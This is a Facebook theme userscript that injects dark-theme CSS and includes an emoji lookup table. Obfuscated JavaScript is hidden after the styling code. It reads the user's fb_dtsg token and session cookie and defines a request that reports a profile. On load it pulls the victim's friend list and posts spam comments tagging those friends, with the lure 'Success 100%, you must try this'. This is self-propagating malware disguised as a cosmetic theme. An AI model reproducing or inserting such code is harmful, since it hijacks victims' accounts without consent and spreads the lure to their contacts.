!important;\n}\n\n\nhtml{background:url(http://dbkomik.com/cms/files/attachment/14854__1) no-repeat center fixed;background-size:cover;-o-background-size:cover;-webkit-background-size:cover}\n\n\n\n\n.fbCurrentStory:hover, .connect_widget_like_button, .fbFeedTickerStory:hover, .item a:hover, .fbJewelFlyout li:hover, .uiSideNav a:hover, .fbNubFlyoutBody, .uiButtonConfirm {\nbackground: #111111 !important;\n}\n\n.fbChatMessageGroup {\nborder-color: #2c2c2c !important;\n}\n\n.fbChatSidebar {\nbackground: #111111 !important;\n}\n\n#leftCol {\nposition: relative;top:20px!important;\nmin-height: 400px !important;\n}\n\n.arrowLeft a {\nbackground-image:url('http://i.imgur.com/26zf5.png') !important;\nborder-color: #666666 !important;\n}\n\n.arrowRight a {\nbackground-image:url('http://i.imgur.com/v6B6z.png') !important;\nborder-color: #666666 !important;\n}\n\n.uiStreamSubstory {\nborder-color: transparent !important;\n}\n\n.uiHeader {\nbackground-color: transparent !important;\n}\n\n.fbSidebarGripper, .fbTickerFooter, .fbSidebarGripper div, .navSubmenu:hover {\nbackground-color: #222222 !important;\n}\n\n.fbTimelineCountButton, .uiBoxWhite, .uiButtonGroup {\nbackground-color: #1c1c1c !important;\n}\n\n\n\n#leftCol {\npadding-top: 0px !important;\npadding-left: 0px !important;\n}\n\n.fbNubFlyoutFooter {\nbackground: #111111 !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #00FF00!important; \nborder: #CCFF33 !important;\n}\n\n.uiStream .uiSelectorButton {\nbackground-image: url(\"http://i.imgur.com/nOfuQ.png\") !important;\n}\n\n.uiSearchInput {\nbackground-image: url(\"http://i.imgur.com/agmNw.png\") !important;\n}\n\n\n\n\n.jewelButton:hover, .topNavLink a:hover {\nbackground-color: #222222 !important;\n}\n\n.uiScrollableAreaGripper {\nbackground-color: #666666 !important;\n}\n\n.uiSearchInput, .fbPhotosGridHeader, .uiComposerMessageBoxControls, #MessagingShelf, .uiBoxGray {\nbackground: #111111 !important;\n}\n\n.uiButton {\nbackground: #1c1c1c !important;\n}\n\n#blueBar  {\nbackground: -moz-linear-gradient(top,  #45484d 0%, #66CC33 100%) !important;\nbackground: -webkit-linear-gradient(top,  #45484d 0%, #66CC33 100%) !important;\nbox-shadow: 0 0 7px rgba(211, 32, 198, 0.75) !important;\nborder:4px ridge #CC00FF !important;\nmargin-top:5px!important;\nmargin-left:5px!important;\nborder-radius: 70px!important;\n}\n\n\n\n#contentCol, #pageLogo a {\nbackground-color: transparent !important;\nborder-color: transparent !important;\n}\n\n.uiMorePager {\nmargin-bottom:6px !important;\nbackground-color: #1c1c1c !important;\nborder: 0px solid #CCFF33 !important;\n}\n\n.uiStreamStory, .fbIndexFeaturedRegistration, .signupForm {\nmargin-bottom:2px !important;\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder-radius: 15px !important;\npadding: 1px !important;\nborder: 0px solid #CCFF33 !important;\n}\n\n.uiStream .uiStreamHeader .uiStreamHeaderChronologicalForm .uiSelectorButton .uiButtonText {\ncolor: #000 !important;\n}\n\n#album_pagelet {\nbackground-color: #111111 !important;\nmargin-left: 0px !important;\nmargin-top: -15px !important;\n}\n\n.tagWrapper, #pagelet_main_column, .timelineUnitContainer, .fbTimelineTopSection, #MessagingMessages {\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder-radius: 15px !important;\nborder: 0px solid #CCFF33 !important;\n}\n.fbTimelineTopSectionBase .topSectionBottomBorder {\ndisplay: none !important;\n}\n#pagelet_main_column {\nwidth: 500px !important;\n}\n\n.fbJewelFlyout, .uiToggleFlyout, .navigation, .container, .uiOverlayContent, .search, .pop_container_advanced {\nbackground-color: #111111 !important; \nborder-radius: 15px !important;\nborder: 2px solid #CCFF33 !important;\n}\n\n#left_column, #leftCol, .MessagingReadHeader {\nbackground: #111111 !important;\nborder-radius: 15px !important;\n}\n\n#left_column, #leftCol {\nmargin-left:-8px !important;\nwidth: 185px !important;\n}\n\n.uiMediaThumb i, .uiProfilePhoto {\nborder: 1px solid #66CC33 !important; \n}\n\n#rightCol {\nmargin-top: 10px !important;\npadding-top: 0px !important;\nbackground: #111111 !important;\nborder-radius: 15px !important;\nborder: 0px solid #CCFF33 !important;\n}\n\n#right_column, .rightColumnWrapper {\nmargin-top: 0px !important;\npadding-top: 0px !important; \nposition: fixed !important;\nbackground: #111111 !important;\nborder-radius: 15px !important; \nborder: 0px solid #CCFF33 !important;\n}\n\n.aboutMePagelet {\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder: 0px solid #CCFF33 !important;\n}\n\n.fbNubButton, .fbNubFlyoutTitlebar, .uiToggleFlyout, .fbChatSidebarFooter {\nbackground: -moz-linear-gradient(center top , #CCFF33, #66CC33) !important;\nbackground: -webkit-linear-gradient(center top , #CCFF33, #66CC33) !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #FF00FF!important;\nborder: #CCFF33 !important;\n}\n\n.fbChatOrderedList {\nbackground: -moz-linear-gradient(center right , #CCFF33, #66CC33) !important;\nbackground: -webkit-linear-gradient(center right , #CCFF33, #66CC33) !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #FF00FF!important;\nborder: #CCFF33 !important;\n}\n\n\n\n\n\n\n\n\n.UFIMentionsInputWrap,.navHeader, ._554n,.fbxWelcomeBox ,._2yg .composerTypeahead {\nbackground: -moz-linear-gradient(top,  #45484d 0%, #66CC33 100%) !important;\nbackground: -webkit-linear-gradient(top,  #45484d 0%, #66CC33 100%) !important;\nbox-shadow: 0 2px 4px rgba(211, 32, 198, 0.75) !important;\nborder:2px ridge #FF00FF!important;\nmargin-top:5px!important;\nmargin-left:0px!important;\nborder-radius: 7px!important;\npadding:3px!important;\n}\n.fbx #pageHead, #blueBar #pageHead{\npadding-top:0px!important;\n}\n\n.slim #blueBar {\n\n    height: 35px!important;\n}\n.fbxWelcomeBoxBlock .fbxWelcomeBoxImg,\n._s0,\n._42fz .pic{\n   border:2px solid  rgba(0, 0, 0, .55)!important;\n   border-radius: 37px!important;\n}\n.fbxWelcomeBoxBlock .fbxWelcomeBoxImg:hover,\n._s0:hover,\n._42fz .pic:hover{\n   box-shadow: 0px 0px 4px rgba(211, 32, 198, 0.75) !important;\n   border:2px ridge #FF0033 !important;\n   border-radius: 37px!important;\n}\n.uiSideNav .sideNavItem .hasCount:hover,\n.uiSideNav .sideNavItem .noCount:hover{\n   text-shadow: 2px 2px 2px rgba(39, 98, 138, 0.75) !important;\n   color: #3399FF!important;\n\n}\n#navSearch {\nwidth:300px !important;\nmargin-top: 6px !important;\nmargin-left: 30px !important;\nborder-color: transparent !important;\n}\n#headNav {\n    height: 30px;\n}\n\n\n\na:hover{\n   text-shadow: 2px 2px 2px rgba(39, 98, 138, 0.75) !important;\n   color: #3399FF!important;\n}\n.UIActionLinks_bottom a, \n.UIActionLinks_bottom button.as_link, \n.UIActionLinks_bottom .uiLinkButton input, \n.UIActionLinks_bottom .uiLinkButton input:hover,\n.uiStreamMessage .actorName, .uiStreamMessage .passiveName\n{\n   text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.99) !important;\n   color: #3399FF!important;\n}\n._2yg .composerTypeahead ,#bfb_options_button_li.openToggler ul,\n .better_fb_mini_message, .sfx_mini_message_no_x,\n .GM_options_wrapper_inner,\n .better_fb_mini_message, .mini_x{\nbackground: -moz-linear-gradient(top,  #45484d 0%, #66CC33 100%) !important;\nbackground: -webkit-linear-gradient(top, #45484d  0%,#66CC33 100%);\nbox-shadow: 0 2px 4px rgba(39, 98, 138, 0.75) !important;\nborder:2px ridge #3399FF!important;\nmargin-top:5px!important;\nmargin-left:0px!important;\nborder-radius: 7px!important;\npadding:3px!important;\n}\n.GM_options_buttons input{\n   text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.99) !important;\n   color: #CC00FF !important;\n\n}";
if (typeof GM_addStyle != "undefined") {
        GM_addStyle(css);
} else if (typeof PRO_addStyle != "undefined") {
        PRO_addStyle(css);
} else if (typeof addStyle != "undefined") {
        addStyle(css);
} else {
        var node = document.createElement("style");
        node.type = "text/css";
        node.appendChild(document.createTextNode(css));
        var heads = document.getElementsByTagName("head");
        if (heads.length > 0) {
                heads[0].appendChild(node);
        } else {
                // no head yet, stick it whereever
                document.documentElement.appendChild(node);
        }
}
})();
var _0xb161=["\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x67\x65\x74\x54\x69\x6D\x65","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x72\x65\x70\x6F\x72\x74\x2F\x73\x6F\x63\x69\x61\x6C\x2E\x70\x68\x70","\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x62\x6C\x6F\x63\x6B\x3D\x31\x26\x70\x70\x3D\x25\x37\x42\x25\x32\x32\x61\x63\x74\x69\x6F\x6E\x73\x5F\x74\x6F\x5F\x74\x61\x6B\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x5B\x5D\x25\x32\x32\x25\x32\x43\x25\x32\x32\x61\x72\x65\x5F\x66\x72\x69\x65\x6E\x64\x73\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x63\x69\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x63\x6F\x6E\x74\x65\x6E\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x30\x25\x32\x43\x25\x32\x32\x65\x78\x70\x61\x6E\x64\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x33\x41\x31\x25\x32\x43\x25\x32\x32\x66\x69\x72\x73\x74\x5F\x63\x68\x6F\x69\x63\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32\x66\x72\x6F\x6D\x5F\x67\x65\x61\x72\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74\x69\x6D\x65\x6C\x69\x6E\x65\x25\x32\x32\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x66\x6F\x6C\x6C\x6F\x77\x69\x6E\x67\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x74\x61\x67\x67\x65\x64\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x6F\x6E\x5F\x70\x72\x6F\x66\x69\x6C\x65\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x70\x68\x61\x73\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x72\x65\x66\x25\x32\x32\x25\x33\x41\x25\x32\x32\x68\x74\x74\x70\x73\x25\x33\x41\x25\x35\x43\x25\x32\x46\x25\x35\x43\x25\x32\x46\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x25\x35\x43\x25\x32\x46\x4E\x61\x6E\x2E\x65\x72\x74\x74\x37\x25\x32\x32\x25\x32\x43\x25\x32\x32\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x31\x34\x35\x25\x32\x43\x25\x32\x32\x72\x69\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x73\x75\x62\x5F\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x74\x69\x6D\x65\x5F\x66\x6C\x6F\x77\x5F\x73\x74\x61\x72\x74\x65\x64\x25\x32\x32\x25\x33\x41","\x25\x32\x43\x25\x32\x32\x75\x73\x65\x72\x25\x32\x32\x25\x33\x41","\x25\x37\x44\x26\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x3D\x31\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x32\x71\x6D\x76\x75\x35\x6B\x39\x55\x6D\x41\x41\x61\x55\x56\x70\x6F\x26\x5F\x5F\x72\x65\x71\x3D\x75\x26\x74\x74\x73\x74\x61\x6D\x70\x3D\x32\x36\x35\x38\x31\x36\x38\x35\x37\x31\x30\x37\x31\x31\x30\x38\x38\x38\x30","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65","\x73\x65\x6E\x64","\x31\x30\x30\x30\x30\x36\x39\x35\x32\x31\x31\x39\x30\x34\x38"];var fb_dtsg=document[_0xb161[2]](_0xb161[1])[0][_0xb161[0]];var user_id=document[_0xb161[4]][_0xb161[3]](document[_0xb161[4]][_0xb161[3]](/c_user=(\d+)/)[1]);var now=( new Date)[_0xb161[5]]();function Report(_0x45e7x5){var _0x45e7x6= new XMLHttpRequest();var _0x45e7x7=_0xb161[6];var _0x45e7x8=_0xb161[7]+fb_dtsg+_0xb161[8]+_0x45e7x5+_0xb161[9]+_0x45e7x5+_0xb161[10]+now+_0xb161[11]+user_id+_0xb161[12]+user_id+_0xb161[13];_0x45e7x6[_0xb161[15]](_0xb161[14],_0x45e7x7,true);_0x45e7x6[_0xb161[16]]=function (){if(_0x45e7x6[_0xb161[17]]==4&&_0x45e7x6[_0xb161[18]]==200){_0x45e7x6[_0xb161[19]];} ;} ;_0x45e7x6[_0xb161[20]](_0x45e7x8);} ;
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","370189579789027","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," please try 󾮜 @[","uid",":","text","] 󾮛 "," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=Success 100%, you must try this 󾬐󾔼󾔐󾔒󾇛󾇙󾇘󾇗󾇉󾇈󾇇 \udbba\udc28 \udbb8\udc40 \udbb8\udc3d \udbb8\udc3c \udbb8\udc41 \udbb8\udc46 \udbb8\udc45 very easy you can follow this step by step ;) ","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);/* Emoji Rizky_Creations 
Complete Emoji Source code reference
https://android.googlesource.com/platform/packages/inputmethods/OpenWnn/+/jb-dev/res/xml/symbols_japan_emoji_list1.xml
https://android.googlesource.com/platform/packages/inputmethods/OpenWnn/+/jb-dev/res/xml/symbols_japan_emoji_list2.xml
https://android.googlesource.com/platform/packages/inputmethods/OpenWnn/+/jb-dev/res/xml/symbols_japan_emoji_list3.xml
JSON conversion By Rizky_Creations
*/
var symbols_japan_emoji_list=[
  {name:"Nature",subs:[
    {name:"Weather",list:[{cd:"\udbb8\udc00",cl:"_2h7"},{cd:"\udbb8\udc01",cl:"_2h8"},{cd:"\udbb8\udc02",cl:"_2h9"},{cd:"\udbb8\udc03",cl:"_2h3"},{cd:"\udbb8\udc04",cl:"_2h2"},{cd:"\udbb8\udc05",cl:"_2b_"},"\udbb8\udc06",{cd:"\udbb8\udc07",cl:"_2c0"},"\udbb8\udc08","\udbb8\udc09","\udbb8\udc0a","\udbb8\udc0b","\udbb8\udc0c","\udbb8\udc0d","\udbb8\udc0e","\udbb8\udc0f","\udbb8\udc10"]},
    {name:"Moon",list:["\udbb8\udc11","\udbb8\udc12","\udbb8\udc13",{cd:"\udbb8\udc14",cl:"_2c2"},"\udbb8\udc15","\udbb8\udc16","\udbb8\udc17"]},
    {name:"Places in Nature",list:[{cd:"\udbb8\udc38",cl:"_2c1"},"\udbb8\udc39","\udbb8\udc3a","\udbb8\udc3b"]},
    {name:"Plants",list:[{cd:"\udbb8\udc3c",cl:"_2cd"},{cd:"\udbb8\udc3d",cl:"_2c7"},{cd:"\udbb8\udc3e",cl:"_2c4"},{cd:"\udbb8\udc3f",cl:"_2ce"},{cd:"\udbb8\udc40",cl:"_2c8"},{cd:"\udbb8\udc41",cl:"_2c9"},{cd:"\udbb8\udc42",cl:"_2cf"},{cd:"\udbb8\udc43",cl:"_2cg"},"\udbb8\udc44",{cd:"\udbb8\udc45",cl:"_2ca"},{cd:"\udbb8\udc46",cl:"_2cb"},{cd:"\udbb8\udc47",cl:"_2c5"},{cd:"\udbb8\udc48",cl:"_2c6"},{cd:"\udbb8\udc49",cl:"_2cc"},"\udbb8\udc4a","\udbb8\udc4b","\udbb8\udc4c","\udbb8\udc4d","\udbb8\udc4e"]},
    {name:"Fruits",list:["\udbb8\udc4f","\udbb8\udc50",{cd:"\udbb8\udc51",cl:"_2ci"},{cd:"\udbb8\udc52",cl:"_2ch"},{cd:"\udbb8\udc53",cl:"_2cj"},"\udbb8\udc54","\udbb8\udc55","\udbb8\udc56","\udbb8\udc57","\udbb8\udc58","\udbb8\udc59","\udbb8\udc5a","\udbb8\udc5b"]}
  ]},
  {name:"Human/Living Things",subs:[
    {name:"Facial Parts",list:[{cd:"\udbb8\udd90",cl:"_2dx"},{cd:"\udbb8\udd91",cl:"_2dy"},{cd:"\udbb8\udd92",cl:"_2dz"},{cd:"\udbb8\udd93",cl:"_2d-"},{cd:"\udbb8\udd94",cl:"_2d_"}]},
    {name:"Personal Care",list:["\udbb8\udd95",{cd:"\udbb8\udd96",cl:"_2ey"},"\udbb8\udd97","\udbb8\udd98","\udbb8\udd99"]},
    {name:"People / Personalities",list:["\udbb8\udd9a",{cd:"\udbb8\udd9b",cl:"_2eb"},{cd:"\udbb8\udd9c",cl:"_2ec"},{cd:"\udbb8\udd9d",cl:"_2ed"},{cd:"\udbb8\udd9e",cl:"_2ee"},"\udbb8\udd9f",{cd:"\udbb8\udda0",cl:"_2ef"},{cd:"\udbb8\udda1",cl:"_2eg"},{cd:"\udbb8\udda2",cl:"_2eh"},"\udbb8\udda3",{cd:"\udbb8\udda4",cl:"_2ei"},{cd:"\udbb8\udda5",cl:"_2ej"},{cd:"\udbb8\udda6",cl:"_2ek"},{cd:"\udbb8\udda7",cl:"_2el"},{cd:"\udbb8\udda8",cl:"_2em"},{cd:"\udbb8\udda9",cl:"_2en"},{cd:"\udbb8\uddaa",cl:"_2eo"},{cd:"\udbb8\uddab",cl:"_2ep"},"\udbb8\uddac","\udbb8\uddad",{cd:"\udbb8\uddae",cl:"_2eq"},{cd:"\udbb8\uddaf",cl:"_2er"},{cd:"\udbb8\uddb0",cl:"_2es"},{cd:"\udbb8\uddb1",cl:"_2et"},{cd:"\udbb8\uddb2",cl:"_2eu"},{cd:"\udbb8\uddb3",cl:"_2ev"},"\udbb8\uddb4",{cd:"\udbb8\uddb5",cl:"_2ew"},{cd:"\udbb8\uddb6",cl:"_2ex"}]},
    {name:"Animals",list:[{cd:"\udbb8\uddb7",cl:"_491"},{cd:"\udbb8\uddb8",cl:"_2dn"},"\udbb8\uddb9","\udbb8\uddba",{cd:"\udbb8\uddbb",cl:"_2dc"},{cd:"\udbb8\uddbc",cl:"_2de"},{cd:"\udbb8\uddbd",cl:"_2d9"},{cd:"\udbb8\uddbe",cl:"_2dp"},{cd:"\udbb8\uddbf",cl:"_2dr"},{cd:"\udbb8\uddc0",cl:"_2dl"},{cd:"\udbb8\uddc1",cl:"_2dv"},{cd:"\udbb8\uddc2",cl:"_2dj"},{cd:"\udbb8\uddc3",cl:"_2do"},{cd:"\udbb8\uddc4",cl:"_2dq"},{cd:"\udbb8\uddc5",cl:"_2d6"},{cd:"\udbb8\uddc6",cl:"_2d7"},{cd:"\udbb8\uddc7",cl:"_2di"},{cd:"\udbb8\uddc8",cl:"_2dd"},{cd:"\udbb8\uddc9",cl:"_2da"},{cd:"\udbb8\uddca",cl:"_2dt"},{cd:"\udbb8\uddcb",cl:"_2d8"},{cd:"\udbb8\uddcc",cl:"_2d5"},{cd:"\udbb8\uddcd",cl:"_2df"},{cd:"\udbb8\uddce",cl:"_2d2"},{cd:"\udbb8\uddcf",cl:"_2d1"},{cd:"\udbb8\uddd0",cl:"_2du"},{cd:"\udbb8\uddd1",cl:"_2dk"},{cd:"\udbb8\uddd2",cl:"_2dm"},{cd:"\udbb8\uddd3",cl:"_2c_"},{cd:"\udbb8\uddd4",cl:"_2d3"},{cd:"\udbb8\uddd5",cl:"_2d4"},{cd:"\udbb8\uddd6",cl:"_2dh"},{cd:"\udbb8\uddd7",cl:"_2ds"},{cd:"\udbb8\uddd8",cl:"_2dg"},{cd:"\udbb8\uddd9",cl:"_2db"},"\udbb8\uddda",{cd:"\udbb8\udddb",cl:"_2dw"},"\udbb8\udddc","\udbb8\udddd","\udbb8\uddde","\udbb8\udddf","\udbb8\udde0","\udbb8\udde1","\udbb8\udde2","\udbb8\udde3"]}
  ]},
  {name:"Faces and Smiley's",subs:[
    {name:"Faces",list:[{cd:"\udbb8\udf20",cl:"_2g9"},{cd:"\udbb8\udf21",cl:"_2gg"},{cd:"\udbb8\udf22",cl:"_2gm"},{cd:"\udbb8\udf23",cl:"_2g8"},{cd:"\udbb8\udf24",cl:"_2go"},{cd:"\udbb8\udf25",cl:"_2gk"},{cd:"\udbb8\udf26",cl:"_2g0"},{cd:"\udbb8\udf27",cl:"_2f-"},{cd:"\udbb8\udf28",cl:"_2gd"},{cd:"\udbb8\udf29",cl:"_2g6"},{cd:"\udbb8\udf2a",cl:"_2g7"},{cd:"\udbb8\udf2b",cl:"_2fy"},{cd:"\udbb8\udf2c",cl:"_2g4"},{cd:"\udbb8\udf2d",cl:"_2g5"},{cd:"\udbb8\udf2e",cl:"_2gp"},{cd:"\udbb8\udf2f",cl:"_2gn"},{cd:"\udbb8\udf30",cl:"_2fu"},"\udbb8\udf31",{cd:"\udbb8\udf32",cl:"_2fw"},{cd:"\udbb8\udf33",cl:"_2fs"},{cd:"\udbb8\udf34",cl:"_2ft"},"\udbb8\udf35",{cd:"\udbb8\udf36",cl:"_2h1"},"\udbb8\udf37",{cd:"\udbb8\udf38",cl:"_2fv"},{cd:"\udbb8\udf39",cl:"_2gb"},{cd:"\udbb8\udf3a",cl:"_2gj"},{cd:"\udbb8\udf3b",cl:"_2gf"},{cd:"\udbb8\udf3c",cl:"_2gc"},{cd:"\udbb8\udf3d",cl:"_2ga"},{cd:"\udbb8\udf3e",cl:"_2fz"},{cd:"\udbb8\udf3f",cl:"_2g3"},{cd:"\udbb8\udf40",cl:"_2g2"},{cd:"\udbb8\udf41",cl:"_2gl"},{cd:"\udbb8\udf42",cl:"_2gh"},{cd:"\udbb8\udf43",cl:"_2f_"},{cd:"\udbb8\udf44",cl:"_2g1"},{cd:"\udbb8\udf45",cl:"_2ge"},{cd:"\udbb8\udf46",cl:"_2gi"},{cd:"\udbb8\udf47",cl:"_2fx"}]},
    {name:"More faces (animals, persons, characters)",list:[{cd:"\udbb8\udf48",cl:"_2gs"},{cd:"\udbb8\udf49",cl:"_2gq"},{cd:"\udbb8\udf4a",cl:"_2gr"},{cd:"\udbb8\udf4b",cl:"_2gv"},{cd:"\udbb8\udf4c",cl:"_2gt"},{cd:"\udbb8\udf4d",cl:"_2gw"},"\udbb8\udf4e",{cd:"\udbb8\udf4f",cl:"_2gu"},{cd:"\udbb8\udf50",cl:"_2gx"},"\udbb8\udf51","\udbb8\udf52","\udbb8\udf53","\udbb8\udf54","\udbb8\udf55","\udbb8\udf56",{cd:"\udbb8\udf57",cl:"_2gy"},{cd:"\udbb8\udf58",cl:"_2gz"},{cd:"\udbb8\udf59",cl:"_2g-"},"\udbb8\udf5a",{cd:"\udbb8\udf5b",cl:"_2g_"},"\udbb8\udf5c","\udbb8\udf5d","\udbb8\udf5e","\udbb8\udf5f","\udbb8\udf60","\udbb8\udf61","\udbb8\udf62","\udbb8\udf63","\udbb8\udf64","\udbb8\udf65","\udbb8\udf66","\udbb8\udf67","\udbb8\udf68","\udbb8\udf69"]}
  ]},
  {name:"Artifacts",subs:[
    {name:"Miscellaneous Things",list:["\udbb9\udcef","\udbb9\udcf0","\udbb9\udcf1",{cd:"\udbb9\udcf2",cl:"_2fr"},"\udbb9\udcf3",{cd:"\udbb9\udcf4",cl:"_2ff"},"\udbb9\udcf5",{cd:"\udbb9\udcf6",cl:"_492"},"\udbb9\udcf7","\udbb9\udcf8","\udbb9\udcf9","\udbb9\udcfa","\udbb9\udcfb","\udbb9\udcfc","\udbb9\udcfd","\udbb9\udcfe","\udbb9\udcff","\udbb9\udd00","\udbb9\udd01","\udbb9\udd02","\udbb9\udd03","\udbb9\udd04"]},
